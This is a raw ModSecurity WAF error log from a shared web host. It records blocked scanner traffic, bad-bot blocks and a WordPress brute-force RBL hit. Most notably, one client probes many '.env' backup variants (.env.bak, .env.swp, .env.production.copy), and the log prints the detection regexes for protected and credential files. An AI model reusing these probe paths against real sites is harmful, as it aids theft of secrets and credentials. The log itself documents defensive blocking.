[Tue May 26 15:27:04.244338 2026] [security2:error] [pid 715645:tid 715843] [client 104.194.132.199:60952] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVucHVGgMGh8k213RjszAAAAEQ"], referer: https://www.cagmedya.com/isletmeler-icin-web-sitesi-guvenligi/
[Tue May 26 15:27:04.598407 2026] [security2:error] [pid 715645:tid 715832] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/option-power.php"] [unique_id "ahVucHVGgMGh8k213Rjs3wAAADk"], referer: http://stockmarketanalysis.in/option-power.php
[Tue May 26 15:27:04.844271 2026] [security2:error] [pid 715645:tid 715880] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVucHVGgMGh8k213Rjs2QAAAGk"]
[Tue May 26 15:27:04.980525 2026] [security2:error] [pid 715645:tid 715830] [client 104.194.132.199:60991] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVucHVGgMGh8k213Rjs7AAAADc"], referer: https://www.cagmedya.com/isletmeler-icin-web-sitesi-guvenligi/
[Tue May 26 15:27:05.200276 2026] [security2:error] [pid 715645:tid 715794] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/option-service.php"] [unique_id "ahVucXVGgMGh8k213Rjs7gAAABM"], referer: http://stockmarketanalysis.in/option-service.php
[Tue May 26 15:27:05.546019 2026] [security2:error] [pid 715645:tid 715824] [client 207.241.173.79:16076] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/api/.env"] [unique_id "ahVucXVGgMGh8k213RjtAgAAADE"]
[Tue May 26 15:27:05.546180 2026] [security2:error] [pid 715645:tid 715889] [client 207.241.173.79:16038] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env"] [unique_id "ahVucXVGgMGh8k213RjtCAAAAHI"]
[Tue May 26 15:27:05.546759 2026] [security2:error] [pid 715645:tid 715822] [client 207.241.173.79:16080] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/backend/.env"] [unique_id "ahVucXVGgMGh8k213RjtBwAAAC8"]
[Tue May 26 15:27:05.548519 2026] [security2:error] [pid 715645:tid 715801] [client 207.241.173.79:16064] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/app/.env"] [unique_id "ahVucXVGgMGh8k213RjtCwAAABo"]
[Tue May 26 15:27:05.804780 2026] [security2:error] [pid 715645:tid 715823] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/payments.php"] [unique_id "ahVucXVGgMGh8k213RjtFAAAADA"], referer: http://stockmarketanalysis.in/payments.php
[Tue May 26 15:27:06.404877 2026] [security2:error] [pid 715645:tid 715825] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/pricing.php"] [unique_id "ahVucnVGgMGh8k213RjtKgAAADI"], referer: http://stockmarketanalysis.in/pricing.php
[Tue May 26 15:27:07.115029 2026] [security2:error] [pid 715645:tid 715783] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/privacy-policy.php"] [unique_id "ahVuc3VGgMGh8k213RjtUAAAAAg"], referer: http://stockmarketanalysis.in/privacy-policy.php
[Tue May 26 15:27:07.175270 2026] [security2:error] [pid 715645:tid 715892] [client 74.7.230.27:33900] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.alpimentel.contabilidadecarioca.com.br"] [uri "/robots.txt"] [unique_id "ahVuc3VGgMGh8k213RjtUQAAAHU"]
[Tue May 26 15:27:07.210040 2026] [security2:error] [pid 715645:tid 715804] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVucnVGgMGh8k213RjtQQAAAB0"]
[Tue May 26 15:27:07.759848 2026] [security2:error] [pid 715645:tid 715782] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/refund-policy.php"] [unique_id "ahVuc3VGgMGh8k213RjtYQAAAAc"], referer: http://stockmarketanalysis.in/refund-policy.php
[Tue May 26 15:27:08.380612 2026] [security2:error] [pid 715645:tid 715779] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/reports.php"] [unique_id "ahVudHVGgMGh8k213RjtdwAAAAQ"], referer: http://stockmarketanalysis.in/reports.php
[Tue May 26 15:27:09.172361 2026] [security2:error] [pid 715645:tid 715810] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/risk-new.php"] [unique_id "ahVudXVGgMGh8k213RjtlgAAACM"], referer: http://stockmarketanalysis.in/risk-new.php
[Tue May 26 15:27:09.381877 2026] [security2:error] [pid 715645:tid 715829] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVudHVGgMGh8k213RjtkgAAADY"]
[Tue May 26 15:27:09.856463 2026] [security2:error] [pid 715645:tid 715823] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/services.php"] [unique_id "ahVudXVGgMGh8k213RjtowAAADA"], referer: http://stockmarketanalysis.in/services.php
[Tue May 26 15:27:10.534544 2026] [security2:error] [pid 715645:tid 715806] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/sitemap.php"] [unique_id "ahVudnVGgMGh8k213RjttgAAAB8"], referer: http://stockmarketanalysis.in/sitemap.php
[Tue May 26 15:27:11.252775 2026] [security2:error] [pid 715645:tid 715775] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/stock-cash-power.php"] [unique_id "ahVud3VGgMGh8k213RjtxgAAAAA"], referer: http://stockmarketanalysis.in/stock-cash-power.php
[Tue May 26 15:27:11.751302 2026] [security2:error] [pid 715645:tid 715842] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVud3VGgMGh8k213RjtzAAAAEM"]
[Tue May 26 15:27:12.034993 2026] [security2:error] [pid 715645:tid 715812] [client 192.42.116.94:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 94.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/stock-cash-tips.php"] [unique_id "ahVud3VGgMGh8k213Rjt3QAAACU"], referer: http://stockmarketanalysis.in/stock-cash-tips.php
[Tue May 26 15:27:12.678337 2026] [security2:error] [pid 715645:tid 715826] [client 192.42.116.94:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 94.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/stock-future-power.php"] [unique_id "ahVueHVGgMGh8k213Rjt7wAAADM"], referer: http://stockmarketanalysis.in/stock-future-power.php
[Tue May 26 15:27:13.017528 2026] [security2:error] [pid 715645:tid 715819] [client 114.119.136.146:53629] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "virgence.com"] [uri "/robots.txt"] [unique_id "ahVueXVGgMGh8k213Rjt8wAAACw"]
[Tue May 26 15:27:13.351956 2026] [security2:error] [pid 715645:tid 715776] [client 192.42.116.94:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 94.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/stock-future-tips.php"] [unique_id "ahVueXVGgMGh8k213RjuAQAAAAE"], referer: http://stockmarketanalysis.in/stock-future-tips.php
[Tue May 26 15:27:13.535298 2026] [security2:error] [pid 715645:tid 715797] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVueXVGgMGh8k213RjuAAAAABY"]
[Tue May 26 15:27:13.818270 2026] [security2:error] [pid 715645:tid 715784] [client 207.241.173.79:16038] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.production.copy"] [unique_id "ahVueXVGgMGh8k213RjuCwAAAAk"]
[Tue May 26 15:27:13.942609 2026] [security2:error] [pid 715645:tid 715816] [client 192.42.116.94:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 94.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/stock-option-tips.php"] [unique_id "ahVueXVGgMGh8k213RjuEgAAACk"], referer: http://stockmarketanalysis.in/stock-option-tips.php
[Tue May 26 15:27:14.596658 2026] [security2:error] [pid 715645:tid 715836] [client 192.42.116.94:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 94.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/terms-and-conditions.php"] [unique_id "ahVuenVGgMGh8k213RjuJgAAAD0"], referer: http://stockmarketanalysis.in/terms-and-conditions.php
[Tue May 26 15:27:14.926629 2026] [security2:error] [pid 715645:tid 715843] [client 207.241.173.79:64676] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.local.bak"] [unique_id "ahVuenVGgMGh8k213RjuMAAAAEQ"]
[Tue May 26 15:27:14.932097 2026] [security2:error] [pid 715645:tid 715887] [client 207.241.173.79:64654] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.orig"] [unique_id "ahVuenVGgMGh8k213RjuMQAAAHA"]
[Tue May 26 15:27:14.933460 2026] [security2:error] [pid 715645:tid 715884] [client 207.241.173.79:64742] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.local.swp"] [unique_id "ahVuenVGgMGh8k213RjuMwAAAG0"]
[Tue May 26 15:27:14.934210 2026] [security2:error] [pid 715645:tid 715899] [client 207.241.173.79:64754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.local.copy"] [unique_id "ahVuenVGgMGh8k213RjuNAAAAHw"]
[Tue May 26 15:27:14.936319 2026] [security2:error] [pid 715645:tid 715786] [client 207.241.173.79:64618] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.backup"] [unique_id "ahVuenVGgMGh8k213RjuNwAAAAs"]
[Tue May 26 15:27:14.936612 2026] [security2:error] [pid 715645:tid 715780] [client 207.241.173.79:64604] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.old"] [unique_id "ahVuenVGgMGh8k213RjuNgAAAAU"]
[Tue May 26 15:27:14.947402 2026] [security2:error] [pid 715645:tid 715879] [client 207.241.173.79:64570] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.bak"] [unique_id "ahVuenVGgMGh8k213RjuOQAAAGg"]
[Tue May 26 15:27:15.448172 2026] [security2:error] [pid 715645:tid 715873] [client 207.241.173.79:64742] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.swp"] [unique_id "ahVue3VGgMGh8k213RjuUgAAAGI"]
[Tue May 26 15:27:15.448172 2026] [security2:error] [pid 715645:tid 715798] [client 207.241.173.79:64712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.copy"] [unique_id "ahVue3VGgMGh8k213RjuUwAAABc"]
[Tue May 26 15:27:15.448655 2026] [security2:error] [pid 715645:tid 715877] [client 207.241.173.79:64754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.local.old"] [unique_id "ahVue3VGgMGh8k213RjuVAAAAGY"]
[Tue May 26 15:27:15.448860 2026] [security2:error] [pid 715645:tid 715812] [client 207.241.173.79:64676] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.local.backup"] [unique_id "ahVue3VGgMGh8k213RjuVQAAACU"]
[Tue May 26 15:27:15.625900 2026] [security2:error] [pid 715645:tid 715842] [client 207.241.173.79:64712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.production~"] [unique_id "ahVue3VGgMGh8k213RjuZAAAAEM"]
[Tue May 26 15:27:15.625902 2026] [security2:error] [pid 715645:tid 715806] [client 207.241.173.79:64676] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.production.old"] [unique_id "ahVue3VGgMGh8k213RjuYQAAAB8"]
[Tue May 26 15:27:15.626256 2026] [security2:error] [pid 715645:tid 715894] [client 207.241.173.79:64754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.production.backup"] [unique_id "ahVue3VGgMGh8k213RjuYgAAAHc"]
[Tue May 26 15:27:15.626366 2026] [security2:error] [pid 715645:tid 715827] [client 207.241.173.79:64654] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.production.swp"] [unique_id "ahVue3VGgMGh8k213RjuZQAAADQ"]
[Tue May 26 15:27:15.726693 2026] [security2:error] [pid 715645:tid 715872] [client 207.241.173.79:64742] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env.production.orig"] [unique_id "ahVue3VGgMGh8k213RjuZgAAAGE"]
[Tue May 26 15:27:15.823921 2026] [security2:error] [pid 715645:tid 715788] [client 51.68.111.207:29915] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grcorp.in"] [uri "/robots.txt"] [unique_id "ahVue3VGgMGh8k213RjuaQAAAA0"]
[Tue May 26 15:27:15.824079 2026] [security2:error] [pid 715645:tid 715788] [client 51.68.111.207:29915] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "grcorp.in"] [uri "/robots.txt"] [unique_id "ahVue3VGgMGh8k213RjuaQAAAA0"]
[Tue May 26 15:27:16.304571 2026] [security2:error] [pid 715645:tid 715748] [remote 103.91.67.202:24392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVufHVGgMGh8k213RjueQAAHmY"]
[Tue May 26 15:27:16.450357 2026] [security2:error] [pid 715645:tid 715885] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVufHVGgMGh8k213RjucwAAAG4"]
[Tue May 26 15:27:16.928791 2026] [security2:error] [pid 715645:tid 715825] [client 207.241.173.79:64640] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/.env~"] [unique_id "ahVufHVGgMGh8k213RjulAAAADI"]
[Tue May 26 15:27:17.554788 2026] [security2:error] [pid 715645:tid 715860] [client 159.69.158.189:38650] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVufXVGgMGh8k213RjulQAAAFU"], referer: http://ucdc.co.in/
